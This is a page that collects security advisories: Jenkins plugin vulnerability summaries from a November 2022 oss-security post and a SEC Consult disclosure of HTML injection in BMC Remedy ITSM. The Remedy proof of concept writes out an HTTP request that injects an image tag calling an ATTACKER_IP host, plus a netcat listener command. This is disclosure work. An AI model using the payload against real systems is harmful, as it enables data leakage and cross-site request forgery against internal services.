Jenkins OSF Builder Suite : : XML Linter Plugin 1.0.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

CVE-2022-45397: Jenkins Security Advisory 2022-11-15

A missing permission check in Jenkins XP-Dev Plugin 1.0 and earlier allows unauthenticated attackers to trigger builds of jobs corresponding to an attacker-specified repository.

CVE-2022-45389: Jenkins Security Advisory 2022-11-15

Jenkins Pipeline Utility Steps Plugin 2.13.1 and earlier does not restrict the set of enabled prefix interpolators and bundles versions of Apache Commons Configuration library that enable the 'file:' prefix interpolator by default, allowing attackers able to configure Pipelines to read arbitrary files from the Jenkins controller file system.

CVE-2022-45381: Jenkins Security Advisory 2022-11-15

Jenkins JUnit Plugin 1159.v0b_396e1e07dd and earlier converts HTTP(S) URLs in test report output to clickable links in an unsafe manner, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

CVE-2022-45380: Jenkins Security Advisory 2022-11-15

Jenkins Config Rotator Plugin 2.0.1 and earlier does not restrict a file name query parameter in an HTTP endpoint, allowing unauthenticated attackers to read arbitrary files with '.xml' extension on the Jenkins controller file system.

CVE-2022-45388: Jenkins Security Advisory 2022-11-15

A missing permission check in Jenkins loader.io Plugin 1.0.1 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.

CVE-2022-45390: Jenkins Security Advisory 2022-11-15

Jenkins JAPEX Plugin 1.7 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

CVE-2022-45400: Jenkins Security Advisory 2022-11-15

Jenkins Associated Files Plugin 0.2.1 and earlier does not escape names of associated files, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

CVE-2022-45401: Jenkins Security Advisory 2022-11-15

Jenkins NS-ND Integration Performance Publisher Plugin 4.8.0.143 and earlier globally and unconditionally disables SSL/TLS certificate and hostname validation for the entire Jenkins controller JVM.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 15 Nov 2022 18:40:52 +0100
From: Daniel Beck <ml@...kweb.net>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities in Jenkins plugins

Jenkins is an open source automation server which enables developers around
the world to reliably build, test, and deploy their software.

The following releases contain fixes for security vulnerabilities:

\* CloudBees Docker Hub/Registry Notification Plugin 2.6.2.1
\* JUnit Plugin 1160.vf1f01a\_a\_ea\_b\_7f
\* Naginator Plugin 1.18.2
\* NS-ND Integration Performance Publisher Plugin 4.8.0.146
\* Pipeline Utility Steps Plugin 2.13.1 and 2.13.2
\* Reverse Proxy Auth Plugin 1.7.4
\* Script Security Plugin 1190.v65867a\_a\_47126
\* Support Core Plugin 1206.1208.v9b\_7a\_1d48db\_0f

Additionally, we announce unresolved security issues in the following
plugins:

\* Associated Files Plugin
\* BART Plugin
\* CCCC Plugin
\* Cluster Statistics Plugin
\* Config Rotator Plugin
\* Delete log Plugin
\* JAPEX Plugin
\* loader.io Plugin
\* NS-ND Integration Performance Publisher Plugin
\* OSF Builder Suite :: XML Linter Plugin
\* SourceMonitor Plugin
\* Violations Plugin
\* XP-Dev Plugin

Summaries of the vulnerabilities are below. More details, severity, and
attribution can be found here:
https://www.jenkins.io/security/advisory/2022-11-15/

We provide advance notification for security updates on this mailing list:
https://groups.google.com/d/forum/jenkinsci-advisories

If you discover security vulnerabilities in Jenkins, please report them as
described here:
https://www.jenkins.io/security/#reporting-vulnerabilities

---

SECURITY-2564 / CVE-2022-45379
Script Security Plugin 1189.vb\_a\_b\_7c8fd5fde and earlier stores
whole-script approvals as the SHA-1 hash of the approved script. SHA-1 no
longer meets the security standards for producing a cryptographically
secure message digest.


SECURITY-2888 / CVE-2022-45380
JUnit Plugin 1159.v0b\_396e1e07dd and earlier converts HTTP(S) URLs in test
report output to clickable links.

This is done in an unsafe manner, resulting in a stored cross-site
scripting (XSS) vulnerability exploitable by attackers with Item/Configure
permission.


SECURITY-2948 / CVE-2022-33980
Pipeline Utility Steps Plugin implements a \`readProperties\` Pipeline step
that supports interpolation of variables using the Apache Commons
Configuration library.

Pipeline Utility Steps Plugin 2.13.0 and earlier does not restrict the set
of enabled prefix interpolators and bundles versions of this library with
the vulnerability CVE-2022-33980.

This vulnerability allows attackers able to configure Pipelines to execute
arbitrary code in the context of the Jenkins controller JVM.


SECURITY-2949 / CVE-2022-45381
Pipeline Utility Steps Plugin implements a \`readProperties\` Pipeline step
that supports interpolation of variables using the Apache Commons
Configuration library.

Pipeline Utility Steps Plugin 2.13.1 and earlier does not restrict the set
of enabled prefix interpolators and bundles versions of this library that
enable the \`file:\` prefix interpolator by default.

This allows attackers able to configure Pipelines to read arbitrary files
from the Jenkins controller file system.


SECURITY-2946 / CVE-2022-45382
Naginator Plugin 1.18.1 and earlier does not escape display names of source
builds in builds that were triggered via Retry action.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers able to edit build display names.


SECURITY-2804 / CVE-2022-45383
Support Core Plugin defines the permission Support/DownloadBundle that
allows users without Overall/Administer permission to create and download
support bundles containing a limited set of diagnostic information.

Support Core Plugin 1206.v14049fa\_b\_d860 and earlier does not correctly
perform permission checks in several HTTP endpoints.

This allows attackers with Support/DownloadBundle permission to download a
previously created support bundle containing information limited to users
with Overall/Administer permission.


SECURITY-2094 / CVE-2022-45384
Reverse Proxy Auth Plugin 1.7.3 and earlier stores the LDAP manager
password unencrypted in the global \`config.xml\` file on the Jenkins
controller as part of its configuration.

This password can be viewed by attackers with access to the Jenkins
controller file system.


SECURITY-2843 / CVE-2022-45385
CloudBees Docker Hub/Registry Notification Plugin provides several webhook
endpoints that can be used to trigger builds when Docker images used by a
job have been rebuilt.

In CloudBees Docker Hub/Registry Notification Plugin 2.6.2 and earlier,
these endpoints can be accessed without authentication.

This allows unauthenticated attackers to trigger builds of jobs
corresponding to the attacker-specified repository.


SECURITY-766 / CVE-2022-45386
Violations Plugin 0.7.11 and earlier does not configure its XML parser to
prevent XML external entity (XXE) attacks.

This allows attackers to to control XML input files for the 'Report
Violations' post-build step to have agent processes parse a crafted file
that uses external entities for extraction of secrets from the Jenkins
agent or server-side request forgery.

As of publication of this advisory, there is no fix.


SECURITY-2802 / CVE-2022-45387
BART Plugin 1.0.3 and earlier does not escape the parsed content of build
logs before rendering it on the Jenkins UI.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers with Item/Configure permission.

As of publication of this advisory, there is no fix.


SECURITY-2842 / CVE-2022-45388
Config Rotator Plugin 2.0.1 and earlier does not restrict a file name query
parameter in an HTTP endpoint.

This allows unauthenticated attackers to read arbitrary files with \`.xml\`
extension on the Jenkins controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2853 / CVE-2022-45389
XP-Dev Plugin provides a webhook endpoint at \`/xpdev-webhook\` that can be
used to trigger builds configured to use a specified repository.

In XP-Dev Plugin 1.0 and earlier, this endpoint can be accessed without
authentication.

This allows unauthenticated attackers to trigger builds of jobs
corresponding to an attacker-specified repository.

As of publication of this advisory, there is no fix.


SECURITY-2857 / CVE-2022-45390
loader.io Plugin 1.0.1 and earlier does not perform a permission check in
an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials
IDs of credentials stored in Jenkins. Those can be used as part of an
attack to capture the credentials using another vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2910 (1) / CVE-2022-45391
NS-ND Integration Performance Publisher Plugin 4.8.0.143 and earlier
globally and unconditionally disables SSL/TLS certificate and hostname
validation for the entire Jenkins controller JVM.


SECURITY-2910 (2) / CVE-2022-38666
NS-ND Integration Performance Publisher Plugin 4.8.0.146 and earlier
unconditionally disables SSL/TLS certificate and hostname validation for
several features.

As of publication of this advisory, there is no fix.


SECURITY-2912 / CVE-2022-45392
NS-ND Integration Performance Publisher Plugin 4.8.0.143 and earlier stores
passwords unencrypted in job \`config.xml\` files on the Jenkins controller
as part of its configuration.

These passwords can be viewed by attackers with Item/Extended Read
permission or access to the Jenkins controller file system.


SECURITY-2920 / CVE-2022-45393 (CSRF) & CVE-2022-45394 (missing permission check)
Delete log Plugin 1.0 and earlier does not perform a permission check in an
HTTP endpoint.

This allows attackers with Item/Read permission to delete build logs.

Additionally, this HTTP endpoint does not require POST requests, resulting
in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2921 / CVE-2022-45395
CCCC Plugin 0.6 and earlier does not configure its XML parser to prevent
XML external entity (XXE) attacks.

This allows attackers able to control the contents of the report file for
the 'Publish CCCC Report' post-build step to have agent processes parse a
crafted file that uses external entities for extraction of secrets from the
Jenkins agent or server-side request forgery.

As of publication of this advisory, there is no fix.


SECURITY-2927 / CVE-2022-45396
SourceMonitor Plugin 0.2 and earlier does not configure its XML parser to
prevent XML external entity (XXE) attacks.

This allows attackers able to control XML input files for the 'Publish
SourceMonitor results' post-build step to have agent processes parse a
crafted file that uses external entities for extraction of secrets from the
Jenkins agent or server-side request forgery.

As of publication of this advisory, there is no fix.


SECURITY-2937 / CVE-2022-45397
OSF Builder Suite :: XML Linter 1.0.2 and earlier does not configure its
XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control XML files that get processed by the
'OSF Builder Suite :: XML Linter' build step to have agent processes parse
a crafted file that uses external entities for extraction of secrets from
the Jenkins agent or server-side request forgery.

As of publication of this advisory, there is no fix.


SECURITY-2938 / CVE-2022-45398 (CSRF) & CVE-2022-45399 (missing permission check)
Cluster Statistics Plugin 0.4.6 and earlier does not perform a permission
check in an HTTP endpoint.

This allows attackers with Overall/Read permission to delete recorded
Jenkins Cluster Statistics.

Additionally, this HTTP endpoint does not require POST requests, resulting
in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2941 / CVE-2022-45400
JAPEX Plugin 1.7 and earlier does not configure its XML parser to prevent
XML external entity (XXE) attacks.

This allows attackers able to control XML input files for the 'Record Japex
test report' post-build step to have Jenkins parse a crafted file that uses
external entities for extraction of secrets from the Jenkins controller or
server-side request forgery.

As of publication of this advisory, there is no fix.


SECURITY-2947 / CVE-2022-45401
Associated Files Plugin 0.2.1 and earlier does not escape names of
associated files.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers with Item/Configure permission.

As of publication of this advisory, there is no fix.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-45391: security - Multiple vulnerabilities in Jenkins plugins

BMC Remedy ITSM-Suite version 9.1.10 (20.02 in new versioning scheme) suffers from an html injection vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20221110-0 >  
=======================================================================  
               title: HTML Injection  
             product: BMC Remedy ITSM-Suite  
  vulnerable version: 9.1.10 (= 20.02 in new versioning scheme)  
       fixed version: 22.1  
          CVE number: CVE-2022-26088  
              impact: Low  
            homepage: https://www.bmc.com/it-solutions/remedy-itsm.html  
               found: 2021-08-11  
                  by: Daniel Hirschberger (Office Bochum)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Remedy IT Service Management Suite (Remedy ITSM Suite) and BMC Helix  
ITSM service provide out of-the-box IT Information Library (ITIL)  
service support functionality. Remedy ITSM Suite and BMC Helix ITSM  
service streamline and automate the processes around IT service desk,  
asset management, and change management operations. It also enables  
you to link your business services to your IT infrastructure to help  
you manage the impact of technology changes on business and business  
changes on technology — in real time and into the future. In addition,  
you can understand and optimize the user experience, balance current  
and future infrastructure investments, and view potential impact on  
the business by using a real-time service model."

Source: https://docs.bmc.com/docs/itsm91/home-608490971.html

Business recommendation:  
------------------------  
The vendor provides an updated version which should be installed immediately.

The vendor states that:  
 > We have done hardening in version 22.1.  
 > However, we do not agree with assigning the CVE to this vulnerability.  
 > As mentioned previously this is an informative vulnerability, and no real  
   impact is demonstrated.

Nevertheless, this can be used to trigger actions on internal services via CSRF or  
exfiltrate information.

Vulnerability overview/description:  
-----------------------------------  
1) HTML Injection (CVE-2022-26088)  
An authenticated attacker who can forward incidents per email is able to inject  
a limited set of HTML tags. This is accomplished by inserting arbitrary content  
into the "To:" field of the email. There is a filtering mechanism that prevents  
the injection of many HTML tags, for example <script>, and it also removes event  
handlers. An attacker is able to insert an image tag with an arbitrary src URL.

After sending the email, an entry is appended into the activity log of the  
incident which states that $USER has sent an email to <X> recipients. Upon  
clicking on the number <X>, the injected HTML code is loaded and executed.

By inserting an <img> with an arbitrary "src" attribute, an attacker can force  
the user's browser to make requests to his specified URL. This can be used to  
trigger actions on internal services via CSRF or exfiltrate information.

Proof of concept:  
-----------------  
1) HTML Injection (CVE-2022-26088)  
When an incident is viewed, there is a button which allows forwarding the  
incident by mail. After entering a TO address and the body of the email, it can  
be sent by clicking on the send button.

The HTML injection can be performed by intercepting this request and changing  
the 'Email.To.InternetEmail' parameter. The modified request is:

-------------------------------------------------------------------------------  
PUT /rest/incident/worknote/SOME_INCIDENT_ID HTTP/1.1  
Host: TARGET  
Cookie: […]  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: application/json, text/plain, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/json;charset=utf-8  
X-Xsrf-Token: SOME_TOKEN  
Content-Length: ADAPT_AS_NEEDED  
Te: trailers  
Connection: close

{  
   "worknote": "pentest",  
   "access": true,  
   "Email.From.Person": {  
     "email": "SOME_SENDING_MAIL",  
     "fullName": "Pentest - SEC Consult",  
     "loginId": "USERNAME"  
   },  
   "Email.Subject": "SOME_SUBJECT",  
   "Email.Body": "test2",  
   "Email.To.InternetEmail": "<img src=http://ATTACKER_IP:8001/>a@example.test",  
   "workInfoType": 16000  
}  
-------------------------------------------------------------------------------

The parameter Email.To.InternetEmail contains the payload. In this case an  
image tag containing the IP of the attacker was inserted:  
"<img src=http://LOCAL_IP:8001/>a@example.test"  
The a@example.test is needed to pass the email validation step and example.test  
was used to prevent sending out real emails.

After this step, the information that $USER has sent an email to 1 recipient  
will be appended in the activity log of this incident.

Now we start a local netcat listener with the command  
$ nc -vnlp 8001

Now we click on the number '1' in the activity log and see that the browser  
issues a request to our 'netcat' instance.

This confirms that the browser tries to load the image from the specified URL.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested:  
* 9.1.10 this corresponds to version 20.02 as stated at the following URL:  
https://community.bmc.com/s/news/aA33n000000CmmSCAS/remedy-version-mapping

Vendor contact timeline:  
------------------------  
2021-09-07: Contacting vendor through email (appsec@bmc.com).  
2021-09-28: Vendor states that they did not get the first email.  
2021-09-29: Resending the advisory to their renewed GPG key.  
2021-10-29: Fix pending, request to delay publication.  
2021-11-18: Vulnerability is fixed and the fix is being evaluated.  
2022-01-17: Asking for a status update.  
2022-01-17: Vulnerability is fixed, no scheduled release.  
2022-01-24: Tentative release on 2022-03-09; discussing impact 'best practice' vs 'low'.  
2022-02-24: Fixed in Smart-IT 22.1, release postponed.  
2022-03-30: Release postponed to May 2022.  
2022-04-20: Asking if the fixed version will be released in May.  
2022-05-17: Asking if the fixed version will be released in May.  
2022-05-23: Release rescheduled to end of June/July  
2022-08-04: Asking for status  
2022-08-05: Product was released  
2022-08-31: Asking for link to update  
2022-09-01: Vendor does not agree with getting a CVE assigned, impact is explained again  
2022-09-06: Vendor asks for final version of advisory  
2022-09-06: Asking vendor for a new GPG key because of expiry  
2022-09-07: Sending the final advisory to the vendor  
2022-09-12: Vendor will check the advisory and answer in 1 or 2 days  
2022-09-14: Vendor states that their application is not vulnerable to CSRF and  
             asks if other data could be leaked via the HTTP request  
2022-09-15: We clarify that their application does not seem to be vulnerable to  
             CSRF but the HTML injection allows CSRFing other applications in the intranet.  
             Also we did not have time to assess if other data besides User-Agent and the  
             client's IP can be leaked.  
2022-10-04: We request an update to the previous mail.  
2022-10-19: Vendor sticks to their own original impact analysis.  
2022-11-10: Public release of security advisory.

Solution:  
---------  
Upgrade to version 22.1 or later which can be downloaded at the vendor's page:  
https://www.bmc.com/support/resources/product-downloads.html

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Daniel Hirschberger / @2022

Tag

#csrf